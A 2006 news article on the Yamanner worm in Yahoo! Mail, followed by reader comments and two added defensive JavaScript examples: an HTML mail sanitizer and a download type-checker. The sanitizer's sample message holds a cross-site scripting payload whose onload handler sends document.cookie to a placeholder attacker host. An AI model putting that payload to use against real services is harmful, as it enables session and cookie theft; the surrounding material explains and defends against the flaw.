Yahoo e-mail worm infects without user interaction


A new type of JavaScript worm has appeared on Yahoo!'s e-mail service that spreads without the user having to do anything other than open the e-mail containing it. The worm is called JS.Yamanner@m, and it takes advantage of a flaw in Yahoo! Mail's handling of HTML e-mail that lets script embedded in a message run in the recipient's web browser, inside the user's logged-in Yahoo! Mail session. Once running, the worm reads the user's contact lists, picks out the addresses ending in yahoo.com and yahoogroups.com, and transmits that list to a remote server. The user's browser is also directed to the URL http://www.av3.net/index.htm.

Symantec Security Response says this worm works the same way as mass-mailing worms, but gets around the need for the user to click a link or open an attachment to trigger the infection. Because the flaw is in Yahoo!'s web service rather than in software on the user's machine, there is no patch for users to install; Yahoo! says it has already deployed a fix for all Yahoo! Mail users. As a precaution, users should block e-mail from av3@yahoo.com, the address the worm sends from.
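The flaw described above is a stored cross-site scripting problem: the service filters HTML mail before showing it, and any script that survives the filter runs with the reader's session. The example below is added here and is not the article's, Symantec's or Yahoo!'s code; it contrasts a blacklist filter that strips event handlers only when whitespace precedes them with an allowlist filter that parses each tag and keeps only known elements and attributes. The sample message, the host names, the allowlist and the function names are constructed assumptions, and the regex tokenizer is for illustration only; a real deployment should use a proper HTML parser.

```javascript
// Added example, not code from the article or from Yahoo!: two ways a webmail
// service could strip active content from an HTML message before rendering it
// in the recipient's logged-in browser session, and why only the second holds.
// Names, the allowlist and the sample message are illustrative assumptions.

// Constructed sample message (not the real worm). The script rides in an event
// handler glued to the previous attribute's closing quote, so no whitespace
// precedes "onload". Host names are placeholders.
const SAMPLE_MAIL =
  '<p>Hello</p>' +
  '<img src="http://example.invalid/x.gif" target=""onload="' +
  "document.location='http://attacker.invalid/?'+document.cookie" + '">' +
  '<a href="javascript:alert(1)">click</a>';

// Weak approach: a blacklist of regexes. The handler pattern assumes every
// attribute is preceded by whitespace, which HTML does not require.
function blacklistSanitize(html) {
  return html
    .replace(/<script\b[\s\S]*?<\/script\s*>/gi, '')
    .replace(/\s+on[a-z]+\s*=\s*("[^"]*"|'[^']*'|[^\s>]+)/gi, '');
}

// Independent check on a filter's output: any script element, on* handler
// attribute or javascript: URL still present counts as active content.
function hasActiveContent(html) {
  return /<script\b/i.test(html) ||
         /\bon[a-z]+\s*=/i.test(html) ||
         /javascript\s*:/i.test(html);
}

// Hardened approach: parse tags, keep only allowlisted elements/attributes,
// and re-emit them from parsed values so attribute boundaries come from a
// parser, not from a whitespace assumption. Everything else is dropped.
// A Map avoids prototype names such as "constructor" passing an `in` check.
const ALLOWED = new Map([
  ['p', []], ['br', []], ['b', []], ['i', []], ['a', ['href']], ['img', ['src', 'alt']],
]);
const URL_ATTRS = new Set(['href', 'src']);

function safeUrl(value) {
  // Absolute http(s) only; strip whitespace/control chars a browser would skip
  return /^https?:\/\//i.test(value.replace(/[\s\x00-\x1f]/g, ''));
}

function allowlistSanitize(html) {
  // Remove script/style elements together with their bodies
  const stripped = html.replace(/<(script|style)\b[\s\S]*?<\/\1\s*>/gi, '');
  // Regex tokenizer for illustration; a '>' inside an attribute value would
  // confuse it, which is one reason production code uses a real parser.
  const TAG = /<(\/?)([a-zA-Z][a-zA-Z0-9]*)([^>]*)>/g;
  const ATTR = /([^\s=\/>"']+)(?:\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+)))?/g;
  return stripped.replace(TAG, (_m, slash, name, rawAttrs) => {
    const tag = name.toLowerCase();
    if (!ALLOWED.has(tag)) return '';        // unknown element: drop the tag
    if (slash) return `</${tag}>`;
    let kept = '';
    for (const a of rawAttrs.matchAll(ATTR)) {
      const attr = a[1].toLowerCase();
      const value = a[2] ?? a[3] ?? a[4] ?? '';
      if (!ALLOWED.get(tag).includes(attr)) continue;
      if (URL_ATTRS.has(attr) && !safeUrl(value)) continue;
      kept += ` ${attr}="${value.replace(/&/g, '&amp;').replace(/"/g, '&quot;')}"`;
    }
    return `<${tag}${kept}>`;
  });
}

console.log('blacklist leaves active content:', hasActiveContent(blacklistSanitize(SAMPLE_MAIL)));
console.log('allowlist output:', allowlistSanitize(SAMPLE_MAIL));
```

Run it with node: the blacklist version returns the message untouched because nothing matches its "whitespace then on..." pattern, and the allowlist version emits only `<p>Hello</p><img src="http://example.invalid/x.gif"><a>click</a>`, with the javascript: link and the handler gone.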

Matthew's opinion
This type of worm has the potential to infect a lot more people than a standard worm because it doesn't require the user to do anything other than view the e-mail. Luckily Yamanner was very low grade and was shut down in time, but who knows what will happen with the next version? Users often open e-mails simply because they can't tell whether a message is spam or not. In the past, taking a quick look at a suspected spam message has been a relatively safe practice, but with this e-mail you can't even afford to do that if you are on a Yahoo! account.

Blocking the sender address so you never receive the e-mail is the best course of action, but there may be other e-mails out there using the same technique; keep your fingers crossed that your spam filter catches them all, or that your e-mail service is doing a better job of keeping its anti-virus definitions up to date.

User comments: 7 comment(s)

Safe guards (9:54am EST Wed Jun 14 2006): Yahoo could implement an ASCII preview of the email. That may help the user know if the email is spam or not. – by ds

Another option (11:23am EST Wed Jun 14 2006) would be to make the email preview run within a virtualized sandbox of its own, with limits on system interaction from within the preview pane.

Outlook and other email clients could easily do this. It could be somewhat of an inconvenience to end users, but it would stop this type of crap dead in its tracks. Trapping and logging any autorun scripts and the OS/API calls they make could be very helpful in preventing this sort of crap.

Personally I would like all email viewing, whether preview or not, to take place within a virtualized sandbox that protects the OS. Browsing too. Far too many people blindly click on things until something happens. Sandboxing email clients and web browsers would be a big boost to system security. Another useful service would be a file integrity scan that tags and scans incoming downloads, such as MP3s or WMFs or JPEGs: tagging anything downloaded as execute-disabled and then scanning the format of the file to look for irregularities that might be attempted exploits, or simply executable code masquerading as a data file.

In my personal experience, emails with attachments or links are the worst offenders, with embedded HTML or scripting following close behind. Sandboxing the email and browsing environment, and forcing any downloaded content to be both inspected and marked execute-disabled by default, would stop many of the most common exploits cold.

Of course it's an arms race; malware will mutate and try other tricks. – by highlandcynic
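The download scan that the comment above sketches, as an added example that is not part of the comment, the article or any product: it sniffs the real file type from leading magic bytes, compares it with what the file name claims, walks the JPEG segment headers for lengths that point outside the file, and records every download as execute-disabled. The type names, the magic-byte table, the function names and the sample byte strings are constructed for illustration.

```javascript
// Added example, not code from the article or from the commenter: a download
// inspector of the kind the comment above sketches. It sniffs the real type
// from leading magic bytes, compares it with the type the file name claims,
// walks JPEG segment headers looking for structural irregularities, and never
// marks a download executable. Type names, the magic table and the sample
// byte strings are constructed for illustration.

const MAGICS = [
  { type: 'pe-executable', bytes: [0x4d, 0x5a] },              // "MZ" DOS/PE stub
  { type: 'jpeg',          bytes: [0xff, 0xd8, 0xff] },        // SOI followed by a marker
  { type: 'mp3',           bytes: [0x49, 0x44, 0x33] },        // "ID3" tag header
  { type: 'wmf',           bytes: [0xd7, 0xcd, 0xc6, 0x9a] },  // placeable WMF header
];
const EXT_TYPES = new Map([
  ['exe', 'pe-executable'], ['jpg', 'jpeg'], ['jpeg', 'jpeg'], ['mp3', 'mp3'], ['wmf', 'wmf'],
]);

function sniffType(buf) {
  const hit = MAGICS.find(m => buf.length >= m.bytes.length &&
                               m.bytes.every((b, i) => buf[i] === b));
  return hit ? hit.type : 'unknown';
}

// Walk the JPEG header section: after SOI (FF D8) come segments of
// FF <marker> <len16 big-endian, counting itself>, until SOS (FF DA) or
// EOI (FF D9). A length that points outside the file, or a byte where a
// marker should be, is the kind of irregularity a malformed-file exploit needs.
function checkJpegStructure(buf) {
  const issues = [];
  let pos = 2;
  for (;;) {
    if (pos + 2 > buf.length) { issues.push('truncated before SOS/EOI'); break; }
    if (buf[pos] !== 0xff) { issues.push(`expected marker at offset ${pos}, got 0x${buf[pos].toString(16)}`); break; }
    const marker = buf[pos + 1];
    if (marker === 0xd9 || marker === 0xda) break;       // EOI or SOS: header section ends
    if (pos + 4 > buf.length) { issues.push(`segment 0x${marker.toString(16)} truncated`); break; }
    const len = buf.readUInt16BE(pos + 2);
    if (len < 2) { issues.push(`segment 0x${marker.toString(16)} has impossible length ${len}`); break; }
    if (pos + 2 + len > buf.length) { issues.push(`segment 0x${marker.toString(16)} length ${len} overruns file`); break; }
    pos += 2 + len;
  }
  return issues;
}

function inspectDownload(name, buf) {
  const ext = name.includes('.') ? name.split('.').pop().toLowerCase() : '';
  const claimed = EXT_TYPES.get(ext) || 'unknown';
  const detected = sniffType(buf);
  const issues = [];
  if (detected === 'pe-executable' && claimed !== 'pe-executable') {
    issues.push('executable content under a data-file name');
  } else if (claimed !== 'unknown' && detected !== claimed) {
    issues.push(`content is ${detected} but name claims ${claimed}`);
  }
  if (detected === 'jpeg') issues.push(...checkJpegStructure(buf));
  // Policy from the comment: downloads land execute-disabled whatever the outcome
  return { name, claimed, detected, executable: false, quarantine: issues.length > 0, issues };
}

// Constructed samples: a minimal well-formed header, an APP0 segment claiming
// 65535 bytes in a 6-byte file, and a PE stub saved under a picture name.
const GOOD_JPEG = Buffer.from([0xff, 0xd8, 0xff, 0xe0, 0x00, 0x04, 0x4a, 0x46, 0xff, 0xda, 0x00, 0x02]);
const BAD_JPEG  = Buffer.from([0xff, 0xd8, 0xff, 0xe0, 0xff, 0xff]);
const FAKE_JPEG = Buffer.from([0x4d, 0x5a, 0x90, 0x00, 0x03, 0x00]);

for (const data of [GOOD_JPEG, BAD_JPEG, FAKE_JPEG]) {
  console.log(JSON.stringify(inspectDownload('photo.jpg', data)));
}
```

The well-formed sample comes back with no issues, the oversized segment is reported as overrunning the file, and the MZ-prefixed sample is flagged as executable content under a data-file name; all three carry executable: false, which is the "execute disabled by default" part of the suggestion.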

Curious George??? (3:48pm EST Wed Jun 14 2006): Just do a Google search for “virtualized sandbox” and you will find an in-depth description. Or just boot from Knoppix and browse and read your email safely. – by fellow geek

JScript (9:07pm EST Wed Jun 14 2006): Guess this is the bug Microsoft issued a patch for yesterday… :] – by jac

Microsoft vulnerability (5:54am EST Thu Jun 15 2006): It may use Yahoo as a path, but it is a Microsoft vulnerability (look at the Symantec description). I can use my Yahoo account because I woke up last year and dumped all MS products in favour of Linux and OpenOffice etc. (OSS rules)… – by no more ms crap

It has been my experience (9:09am EST Thu Jun 15 2006) that ultimately you cannot protect people (users) from themselves. If someone is hellbent on destroying themselves (their machine) you cannot stop them.

Caveat: sometimes they take others down with them, and this can usually be prevented. – by luxfestinus